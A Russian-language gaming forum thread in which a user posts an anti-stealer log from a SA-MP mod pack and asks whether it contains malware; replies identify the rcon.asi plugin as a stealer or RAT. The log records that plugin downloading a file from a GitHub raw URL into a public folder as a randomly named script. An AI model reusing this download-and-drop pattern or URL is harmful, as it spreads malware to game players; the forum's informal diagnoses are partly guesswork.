Странный лог антистиллера

Perfectly

Новичок
Автор темы
13
1
Версия SA-MP
  1. Любая
Подскажите пожалуйста, есть стиллер, лодер, ратник и тд в этой сборке?

[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[WARNING] > [URLDownloadToFileA] > [E:\games\GRAY SBORKA BY MEKH\rcon.asi] > {szURL: https://raw.githubusercontent.com/sanekdanek/domain/master/domain.txt | szFileName: C:\Users\Public\Music\ndgedgitsvbdhcw.js}
[WARNING] > [URLDownloadToFileW] > [C:\WINDOWS\SYSTEM32\URLMON.DLL] > {szURL: https://raw.githubusercontent.com/sanekdanek/domain/master/domain.txt | szFileName: C:\Users\Public\Music\ndgedgitsvbdhcw.js}
[WARNING] > [InternetOpenW] > [C:\WINDOWS\SYSTEM32\URLMON.DLL] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0)}
[WARNING] > [InternetConnectW] > [C:\WINDOWS\SYSTEM32\URLMON.DLL] > {lpszServerName: raw.githubusercontent.com | lpszUserName: - | lpszPassword: -}
[WARNING] > [InternetConnectA] > [C:\WINDOWS\SYSTEM32\WININET.DLL] > {lpszServerName: raw.githubusercontent.com | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\WINDOWS\SYSTEM32\URLMON.DLL] > {lpszObjectName: /sanekdanek/domain/master/domain.txt}
[PATCHED] > [ZwQueueApcThread] > [C:\WINDOWS\System32\sechost.dll]
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[WARNING] > [InternetOpenW] > [E:\games\GRAY SBORKA BY MEKH\dxgi.dll] > {lpszAgent: reshade}
[WARNING] > [InternetOpenUrlW] > [E:\games\GRAY SBORKA BY MEKH\dxgi.dll] > {lpszUrl: https://api.github.com/repos/crosire/reshade/tags | lpszHeaders: -}
[WARNING] > [InternetOpenUrlA] > [C:\WINDOWS\SYSTEM32\WININET.DLL] > {lpszUrl: https://api.github.com/repos/crosire/reshade/tags | lpszHeaders: -}
 
  • Bug
Реакции: VRush

Perfectly

Новичок
Автор темы
13
1
[WARNING] > [URLDownloadToFileA] > [E:\games\GRAY SBORKA BY MEKH\rcon.asi] - стиллер
удалил его, теперь можно жить спокойно?

[WARNING] > [URLDownloadToFileA] > [E:\games\GRAY SBORKA BY MEKH\rcon.asi] - стиллер
И еще такая фишка, с антистиллером сборка не запускается, это защита какая-то?
 

Zеro

Известный
90
30
удалил его, теперь можно жить спокойно?
хрен знает, но лучше проверь через антивирусники комп и желательно удалить эти сборки.
p.s у меня был такой же ркон.аси и он мог как-то менять код некоторых луа скриптов тем самым заражая сборки всякой фигней ( возможно это тот же самый, но не факт )
 

Perfectly

Новичок
Автор темы
13
1
хрен знает, но лучше проверь через антивирусники комп и желательно удалить эти сборки.
p.s у меня был такой же ркон.аси и он мог как-то менять код некоторых луа скриптов тем самым заражая сборки всякой фигней ( возможно это тот же самый, но не факт )
какой нормальный антивирус взять?
 

rvng

не вернусь назад
Модератор
10,781
5,979
а как этот ркон вообще в сборке мог оказаться? В архиве со сборкой нет его
сам скачался, это ратник
обычно после попадания на этот вирус следует сменить винду
 
  • Нравится
Реакции: Sergio Persson и FBI13

Sergio Persson

Активный
159
35
Подскажите пожалуйста, есть стиллер, лодер, ратник и тд в этой сборке?

[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[WARNING] > [URLDownloadToFileA] > [E:\games\GRAY SBORKA BY MEKH\rcon.asi] > {szURL: https://raw.githubusercontent.com/sanekdanek/domain/master/domain.txt | szFileName: C:\Users\Public\Music\ndgedgitsvbdhcw.js}
[WARNING] > [URLDownloadToFileW] > [C:\WINDOWS\SYSTEM32\URLMON.DLL] > {szURL: https://raw.githubusercontent.com/sanekdanek/domain/master/domain.txt | szFileName: C:\Users\Public\Music\ndgedgitsvbdhcw.js}
[WARNING] > [InternetOpenW] > [C:\WINDOWS\SYSTEM32\URLMON.DLL] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0)}
[WARNING] > [InternetConnectW] > [C:\WINDOWS\SYSTEM32\URLMON.DLL] > {lpszServerName: raw.githubusercontent.com | lpszUserName: - | lpszPassword: -}
[WARNING] > [InternetConnectA] > [C:\WINDOWS\SYSTEM32\WININET.DLL] > {lpszServerName: raw.githubusercontent.com | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\WINDOWS\SYSTEM32\URLMON.DLL] > {lpszObjectName: /sanekdanek/domain/master/domain.txt}
[PATCHED] > [ZwQueueApcThread] > [C:\WINDOWS\System32\sechost.dll]
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[WARNING] > [InternetOpenW] > [E:\games\GRAY SBORKA BY MEKH\dxgi.dll] > {lpszAgent: reshade}
[WARNING] > [InternetOpenUrlW] > [E:\games\GRAY SBORKA BY MEKH\dxgi.dll] > {lpszUrl: https://api.github.com/repos/crosire/reshade/tags | lpszHeaders: -}
[WARNING] > [InternetOpenUrlA] > [C:\WINDOWS\SYSTEM32\WININET.DLL] > {lpszUrl: https://api.github.com/repos/crosire/reshade/tags | lpszHeaders: -}
говно качать не нужно

а как этот ркон вообще в сборке мог оказаться? В архиве со сборкой нет его
dll мог скачать его или другой скрипт
 

VRush

https://t.me/vrushscript
Проверенный
2,349
1,093
Подскажите пожалуйста, есть стиллер, лодер, ратник и тд в этой сборке?

[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[WARNING] > [URLDownloadToFileA] > [E:\games\GRAY SBORKA BY MEKH\rcon.asi] > {szURL: https://raw.githubusercontent.com/sanekdanek/domain/master/domain.txt | szFileName: C:\Users\Public\Music\ndgedgitsvbdhcw.js}
[WARNING] > [URLDownloadToFileW] > [C:\WINDOWS\SYSTEM32\URLMON.DLL] > {szURL: https://raw.githubusercontent.com/sanekdanek/domain/master/domain.txt | szFileName: C:\Users\Public\Music\ndgedgitsvbdhcw.js}
[WARNING] > [InternetOpenW] > [C:\WINDOWS\SYSTEM32\URLMON.DLL] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0)}
[WARNING] > [InternetConnectW] > [C:\WINDOWS\SYSTEM32\URLMON.DLL] > {lpszServerName: raw.githubusercontent.com | lpszUserName: - | lpszPassword: -}
[WARNING] > [InternetConnectA] > [C:\WINDOWS\SYSTEM32\WININET.DLL] > {lpszServerName: raw.githubusercontent.com | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\WINDOWS\SYSTEM32\URLMON.DLL] > {lpszObjectName: /sanekdanek/domain/master/domain.txt}
[PATCHED] > [ZwQueueApcThread] > [C:\WINDOWS\System32\sechost.dll]
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[WARNING] > [InternetOpenW] > [E:\games\GRAY SBORKA BY MEKH\dxgi.dll] > {lpszAgent: reshade}
[WARNING] > [InternetOpenUrlW] > [E:\games\GRAY SBORKA BY MEKH\dxgi.dll] > {lpszUrl: https://api.github.com/repos/crosire/reshade/tags | lpszHeaders: -}
[WARNING] > [InternetOpenUrlA] > [C:\WINDOWS\SYSTEM32\WININET.DLL] > {lpszUrl: https://api.github.com/repos/crosire/reshade/tags | lpszHeaders: -}